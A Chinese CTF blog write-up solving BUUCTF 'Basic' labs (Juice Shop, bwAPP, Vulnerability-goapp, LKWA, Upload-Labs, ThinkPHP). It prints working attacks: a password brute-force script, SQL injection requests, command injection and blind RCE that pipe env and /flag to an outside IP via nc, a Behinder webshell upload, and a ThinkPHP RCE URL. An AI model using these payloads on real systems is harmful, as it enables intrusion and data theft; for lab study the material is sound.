BUUCTF笔记之Basic部分WP

声明:此文仅供学习记录研究使用,切勿用于非法用途,否则后果自负!

1.Linux Labs

这题就是熟悉一下ssh了。

登录找到flag.txt:

2.Java Sec Code

这题有点无语,感觉更像是宣传Java Sec Code这个项目。

拿flag:http://057bfb68-fe8f-4ecb-ad38-ad35f029e01b.node3.buuoj.cn/rce/exec?cmd=env

题外话,对于学习java漏洞来说,这个github项目确实是很好的,我们不能仅仅局限于拿flag刷分数,更多的是要深入研究代码背后的思想。

就像项目作者说的,很多研发编写的Java代码是有漏洞的,与其有时间全世界做漏洞挖掘,不如仔细学习分析一下通常漏洞是怎么写的。本项目作者是在阿里做攻防的同学,他的主要贡献是故意写一个全是漏洞的应用,以便大家可以代码审计分析一个正常写法和漏洞写法是什么样子。

3.Juice Shop

这题也很不错啊,github说的:OWASP Juice Shop is probably the most modern and sophisticated insecure web application! It can be used in security trainings, awareness demos, CTFs and as a guinea pig for security tools! Juice Shop encompasses vulnerabilities from the entire OWASP Top Ten along with many other security flaws found in real-world applications!

牛批!

进去:

查看源代码看下:


<!--
  ~ Copyright (c) 2014-2020 Bjoern Kimminich.
  ~ SPDX-License-Identifier: MIT
  -->

<!doctype html>
<html lang="en">
<head>
  <meta charset="utf-8">
  <title>OWASP Juice Shop</title>
  <meta name="description" content="Probably the most modern and sophisticated insecure web application">
  <meta name="viewport" content="width=device-width, initial-scale=1">
  <link id="favicon" rel="icon" type="image/x-icon" href="assets/public/favicon_js.ico">
  <link rel="stylesheet" type="text/css" href="//cdnjs.cloudflare.com/ajax/libs/cookieconsent2/3.1.0/cookieconsent.min.css" />
  <script src="//cdnjs.cloudflare.com/ajax/libs/cookieconsent2/3.1.0/cookieconsent.min.js"></script>
  <script src="//cdnjs.cloudflare.com/ajax/libs/jquery/2.2.4/jquery.min.js"></script>
  <script>
    window.addEventListener("load", function(){
      window.cookieconsent.initialise({
        "palette": {
          "popup": { "background": "#546e7a", "text": "#ffffff" },
          "button": { "background": "#558b2f", "text": "#ffffff" }
        },
        "theme": "classic",
        "position": "bottom-right",
        "content": { "message": "This website uses fruit cookies to ensure you get the juiciest tracking experience.", "dismiss": "Me want it!", "link": "But me wait!", "href": "https://www.youtube.com/watch?v=9PnbKL3wuH4" }
      })});
  </script>
<link rel="stylesheet" href="styles.css"></head>
<body class="mat-app-background bluegrey-lightgreen-theme">
  <app-root></app-root>
<script src="runtime-es2018.js" type="module"></script><script src="runtime-es5.js" nomodule defer></script><script src="polyfills-es5.js" nomodule defer></script><script src="polyfills-es2018.js" type="module"></script><script src="vendor-es2018.js" type="module"></script><script src="vendor-es5.js" nomodule defer></script><script src="main-es2018.js" type="module"></script><script src="main-es5.js" nomodule defer></script></body>
</html>

无果。遂百度,发现说查看网页源码发现页面#/score-board。怪事了

先访问下吧:

有了。闯关作答模式,对于提升web渗透综合能力非常有帮助。

第一关 Find the carefully hidden 'Score Board' page.

You successfully solved a challenge: Score Board (Find the carefully hidden 'Score Board' page.)

但实际上网页源代码并没有这一提示啊,我日

第二关 Give a devastating zero-star feedback to the store.

给商店一个毁灭级的0星反馈

4.NSB_Login

确认用户名admin存在,查看源码发现提示:

把kali的rockyou导出来,用burp爆破:

133兆1400万行,估计要爆破好一会了。:

额,burp崩掉了,算了,还是上代码:

#!/usr/bin/env python3
# -*- coding: utf-8 -*-
import re
import requests

url = "http://17740528-4330-4259-b509-34a053f9ce62.node3.buuoj.cn/login.php"
HX = "密码错误"

dir = open('C:\\Users\\root\\Desktop\\rockyou.txt')
line = dir.readline()
i = 0
while line:
    line = line.strip('\n')
    d = {'email': 'admin', 'password': line, 'remember_me': 0}
    r = requests.post(url, data=d)
    print line.decode('unicode_escape')
    if len(r.text) != 51:
        print '找到密码:'+str(i)+'\n'+r.text.decode('unicode_escape')
        break
    line = dir.readline()
    i+=1
dir.close()

爆破出密码及flag:

注:这道题有点诡异,爆不出密码,但是根据回显就能拿到flag。

5.bwAPP

拿flag:http://54808425-f223-4ed1-abcd-1a7e96ebb001.node3.buuoj.cn/phpi.php?message=phpinfo();

6.Vulnerability-goapp

随便注册一个账户:

经过测试发现TimeLine下有sql注入:

POST /timeline/searchpost HTTP/1.1
Host: 889c91e4-adfa-4a8c-92d0-d2c90ec45aee.node3.buuoj.cn
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:78.0) Gecko/20100101 Firefox/78.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 122
Origin: http://889c91e4-adfa-4a8c-92d0-d2c90ec45aee.node3.buuoj.cn
Connection: keep-alive
Referer: http://889c91e4-adfa-4a8c-92d0-d2c90ec45aee.node3.buuoj.cn/timeline
Cookie: UserName=tom; SessionID=MUAxLmNvbQ==; UserID=4; adminSID=
Upgrade-Insecure-Requests: 1

post=%22+union+select+(SELECT+group_concat(table_name)+from+information_schema.tables+where+table_schema="vulnapp")%2C1%3B

这里爆字段名,准备把管理员账号密码注出来登上去看看:

爆管理员邮箱(admin@admin.com和amuro@ray.com)

POST /timeline/searchpost HTTP/1.1
Host: 889c91e4-adfa-4a8c-92d0-d2c90ec45aee.node3.buuoj.cn
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:78.0) Gecko/20100101 Firefox/78.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 76
Origin: http://889c91e4-adfa-4a8c-92d0-d2c90ec45aee.node3.buuoj.cn
Connection: keep-alive
Referer: http://889c91e4-adfa-4a8c-92d0-d2c90ec45aee.node3.buuoj.cn/timeline
Cookie: UserName=tom; SessionID=MUAxLmNvbQ==; UserID=4; adminSID=
Upgrade-Insecure-Requests: 1

post=%22+union+select+(SELECT+group_concat(mail)+from+vulnapp.admins)%2C1%3B

爆密码:

登陆上去看看:

一无所获,百度一下:

Go语言代码安全审计分享

得到adminusers这个url下存在任意命令执行问题:

在pkg/admin/admin.go的52行发现命令注入,直观可以看出取出cookie的内容拼接命令语句执行。我们来审计一下:

package admin

import (
	"database/sql"
	"fmt"
	"html/template"
	"log"
	"math/rand"
	"net/http"
	"os/exec"
	"strings"
	"time"

	"golang.org/x/xerrors"

	"github.com/hardw01f/Vulnerability-goapp/pkg/cookie"
)

type Lists struct {
	Uid       string
	UserName  string
	UserLists []string
}

func GetRandString() string {
	rand.Seed(time.Now().UnixNano())
	var letterRunes = []rune("abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ")

	b := make([]rune, 32)
	for i := range b {
		b[i] = letterRunes[rand.Intn(len(letterRunes))]
	}
	return string(b)
}

func StoreAdminSID(adminSessionID string) {
	db, err := sql.Open("mysql", "root:rootwolf@tcp(mysql)/vulnapp")
	if err != nil {
		log.Fatal(err)
	}
	defer db.Close()

	_, err = db.Exec("insert into adminsessions(adminsessionid) values(?)", adminSessionID)
	if err != nil {
		fmt.Printf("%+v\n", err)
	}

}

func GetAdminSid(adminSessionCookie string) (results string, err error) {
	commandLine := "mysql -h mysql -u root -prootwolf -e 'select adminsid from vulnapp.adminsessions where adminsessionid=\"" + adminSessionCookie + "\";'"

	res, err := exec.Command("sh", "-c", commandLine).Output()
	if err != nil {
		fmt.Println(err)
	}

	results = string(res)

	if results != "" {
		return results, nil
	}

	err = xerrors.New("recode was not set")

	return "", err
}

func ShowAdminLogIn(w http.ResponseWriter, r *http.Request) {
	if r.Method == "GET" {
		if cookie.CheckSessionID(r) {
			t, _ := template.ParseFiles("./views/admin/adminlogin.gtpl")
			t.Execute(w, nil)
		} else {
			http.Redirect(w, r, "/login", 302)
		}
	} else {
		http.NotFound(w, nil)
	}
}

func Confirm(w http.ResponseWriter, r *http.Request) {
	if r.Method == "POST" {
		requestMail := r.FormValue("adminmail")
		requestPasswd := r.FormValue("adminpasswd")

		fmt.Println(requestMail, ":", requestPasswd)

		cmd := "mysql -h mysql -u root -prootwolf -e 'select adminid from vulnapp.admins where mail=\"" + requestMail + "\" and passwd=\"" + requestPasswd + "\";'"

		fmt.Println(cmd)

		res, err := exec.Command("sh", "-c", cmd).Output()
		if err != nil {
			fmt.Println("err : ", err)
		}

		if string(res) == "" {
			fmt.Println("not")
			t, _ := template.ParseFiles("./views/admin/failedauthentication.gtpl")
			t.Execute(w, nil)
			return
		}

		fmt.Println(string(res))
		fmt.Println("success")

		adminSessionID := GetRandString()
		fmt.Println(adminSessionID)

		adminSID := &http.Cookie{
			Name:  "adminSID",
			Value: adminSessionID,
		}
		http.SetCookie(w, adminSID)

		StoreAdminSID(adminSessionID)

		t, _ := template.ParseFiles("./views/admin/successauthentication.gtpl")
		t.Execute(w, nil)

	} else {
		http.NotFound(w, nil)
	}
}

func ShowAdminPage(w http.ResponseWriter, r *http.Request) {
	if r.Method == "GET" {
		adminSID, err := r.Cookie("adminSID")
		if err != nil {
			fmt.Printf("%+v\n", err)
		}
		fmt.Println(adminSID.Value)

		adminUid, err := GetAdminSid(adminSID.Value)
		if err != nil {
			fmt.Println("not authentication")
			t, _ := template.ParseFiles("./views/admin/failedauthentication.gtpl")
			t.Execute(w, nil)
			return
		}

		fmt.Println(adminUid)

		uid, err := r.Cookie("UserID")
		if err != nil {
			fmt.Println(err)
		}
		fmt.Println(uid)

		userName, err := r.Cookie("UserName")
		if err != nil {
			fmt.Println(err)
		}
		fmt.Println(userName.Value)

		cmd := "mysql -h mysql -u root -prootwolf -e 'select id,name,mail,age,created_at,updated_at from vulnapp.user where name not in (\"" + userName.Value + "\");'"

		fmt.Println(cmd)

		res, err := exec.Command("sh", "-c", cmd).Output()
		if err != nil {
			fmt.Println("err : ", err)
		}

		splitedRes := strings.Split(string(res), "\n")
		fmt.Println(splitedRes)

		p := Lists{Uid: uid.Value, UserName: userName.Value, UserLists: splitedRes}

		fmt.Println(p)

		t, _ := template.ParseFiles("./views/admin/userlists.gtpl")
		t.Execute(w, p)

	} else {
		http.NotFound(w, nil)
	}
}

重点看GetAdminSid方法:

func GetAdminSid(adminSessionCookie string) (results string, err error) {
	commandLine := "mysql -h mysql -u root -prootwolf -e 'select adminsid from vulnapp.adminsessions where adminsessionid=\"" + adminSessionCookie + "\";'"

	res, err := exec.Command("sh", "-c", commandLine).Output()
	if err != nil {
		fmt.Println(err)
	}

	results = string(res)

	if results != "" {
		return results, nil
	}

	err = xerrors.New("recode was not set")

	return "", err
}

看看adminSessionCookie从哪里来:

买一台服务器使用nc命令复现一下(服务器地址:116.85.64.251):

GET /adminusers HTTP/1.1
Host: 889c91e4-adfa-4a8c-92d0-d2c90ec45aee.node3.buuoj.cn
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:78.0) Gecko/20100101 Firefox/78.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: keep-alive
Referer: http://889c91e4-adfa-4a8c-92d0-d2c90ec45aee.node3.buuoj.cn/adminconfirm
Cookie: UserName=tom; SessionID=MUAxLmNvbQ==; UserID=4;adminSID=ciXSnSZDcwIhJgmtYPSBSVZEIpclEUPF'|echo `env`|nc 116.85.64.251 1234|echo '
Upgrade-Insecure-Requests: 1

然后在116.85.64.251上监听1234端口,成功拿到flag。:

题外话:这道题本身其实是考验go语言代码审计的能力,拿flag其实不是最重要的。

7.LKWA

题外话:我们依然是要以代码审计,提高自己的审计能力为主,拿flag并不是最终的目的。

Lesser Known Web Attack Lab is for intermediate pentester that can test and practice lesser known web attacks such as Object Injection, XSSI, PHAR Deserialization, variables variable ..etc. Write-ups are welcome. My own walk-through is here .

该项目当前存在的漏洞:

  • Blind RCE
  • XSSI
  • PHAR Deserialization
  • PHP Object Injection
  • PHP Object Injection via Cookies
  • PHP Object Injection (Object Reference)
  • SSRF
  • Variables variable

看到这里我就有谱了,blind RCE,大杀器啊!

虽然没有回显,但是无所谓的,一样干。

先echo env发现没有flag,盲猜根目录下有flag:

买一台服务器,监听1234端口:nc -lvvp 1234

然后命令执行:echo `cat /flag`|nc 116.85.25.7 1234|echo 

服务器那边就当真监听到了flag:

8.Webug 4.0

admin/admin登录之后:

选择文件上传。

payload:

POST /control/upload_file/upload_file_1.php HTTP/1.1
Host: afab4711-bc37-4bc6-b0c5-4878eaa53034.node3.buuoj.cn
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:78.0) Gecko/20100101 Firefox/78.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: multipart/form-data; boundary=---------------------------38371522652734190106744779495
Content-Length: 396
Origin: http://afab4711-bc37-4bc6-b0c5-4878eaa53034.node3.buuoj.cn
Connection: keep-alive
Referer: http://afab4711-bc37-4bc6-b0c5-4878eaa53034.node3.buuoj.cn/control/upload_file/upload_file_1.php
Cookie: PHPSESSID=n92qahrtf87daufabjviq65261
Upgrade-Insecure-Requests: 1

-----------------------------38371522652734190106744779495
Content-Disposition: form-data; name="file"; filename="2.phtml"
Content-Type: image/png

GIF89a>>>><script language='php'>eval($_GET['shell']);</script>
-----------------------------38371522652734190106744779495
Content-Disposition: form-data; name="submit"

ä¸ä¼ 
-----------------------------38371522652734190106744779495--

拿flag:

http://afab4711-bc37-4bc6-b0c5-4878eaa53034.node3.buuoj.cn/template/upload/2.phtml?shell=phpinfo();

9.PikaChu

10.[Windows]Upload-Labs-Windows

第一关,上传冰蝎马:

POST /Pass-01/index.php HTTP/1.1
Host: 76a7821b-187a-4035-b40e-3a61f273afce.node3.buuoj.cn
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:78.0) Gecko/20100101 Firefox/78.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: multipart/form-data; boundary=---------------------------131545444913111702653512167775
Content-Length: 825
Origin: http://76a7821b-187a-4035-b40e-3a61f273afce.node3.buuoj.cn
Connection: keep-alive
Referer: http://76a7821b-187a-4035-b40e-3a61f273afce.node3.buuoj.cn/Pass-01/index.php
Upgrade-Insecure-Requests: 1

-----------------------------131545444913111702653512167775
Content-Disposition: form-data; name="upload_file"; filename="3.php"
Content-Type: image/png

<?php 
@error_reporting(0);
session_start();
$key="e45e329feb5d925b";
$_SESSION["k"]=$key;
$post=file_get_contents("php://input");
if(!extension_loaded("openssl")){
	$t="base64_"."decode";
	$post=$t($post."");
	for($i=0;$i<strlen($post);$i++) {$post[$i] = $post[$i]^$key[$i+1&15]; }}else{$post=openssl_decrypt($post, "AES128", $key);}$arr=explode("|",$post);$func=$arr[0];$params=$arr[1];class C{public function __invoke($p) {eval($p."");}}@call_user_func(new C(),$params);?>
-----------------------------131545444913111702653512167775
Content-Disposition: form-data; name="submit"

ä¸ä¼ 
-----------------------------131545444913111702653512167775--

连冰蝎马:

发现文件Fl@g_glzjin_still_w@nts_a_girl_friend.txt

flag就在里面

11.LFI Labs

12.AWD-Test1

http://4bad8dd0-53ec-4f0d-a435-c29dd8e0f144.node4.buuoj.cn:81/index.phpindex.php?s=/Index/\think\app/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]=cat%20/flag

一键get flag。

  • 1
    点赞
  • 13
    收藏
    觉得还不错? 一键收藏
  • 6
    评论

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 6
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值